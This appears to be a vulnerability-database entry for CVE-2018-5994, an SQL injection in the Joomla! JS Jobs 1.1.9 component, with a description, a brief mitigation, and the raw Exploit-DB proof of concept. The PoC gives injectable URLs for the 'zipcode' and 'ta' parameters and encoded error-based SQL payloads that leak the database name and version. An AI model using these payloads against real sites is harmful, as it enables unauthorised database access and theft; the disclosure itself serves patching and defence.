Joomla! Component JS Jobs 1.1.9 - SQL Injection

vendor:

JS Jobs

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: JS Jobs

Affected Version From: 1.1.9

Affected Version To: 1.1.9

Patch Exists: YES

Related CWE: CVE-2018-5994

CPE: a:joomsky:js_jobs:1.1.9

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component JS Jobs 1.1.9 – SQL Injection

Joomla! Component JS Jobs 1.1.9 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'zipcode' and 'ta' parameters in the 'index.php' script. This can be exploited to bypass authentication and disclose sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize user input and escape special characters.

Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component JS Jobs 1.1.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/js-jobs/
# Software Download: http://www.joomsky.com/5/download/1.html
# Version: 1.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5994
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)...Everyone
# http://localhost/[PATH]/index.php/component/jsjobs/newest-jobs?zipcode=[SQL]&option=com_jsjobs&task11=view
#  
# JTI3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMwJTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTdlJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTc0JTQ1JTZmJTZj
# 
# 2)...Users
# http://localhost/[PATH]/index.php?option=com_jsjobs&c=resume&view=resume&layout=view_resume&bd=1&sortby=1&ta=[SQL]
#  
# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTMyJTY1JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTI5JTJjJTMwJTM2JTI5JTI5
# 
# # # #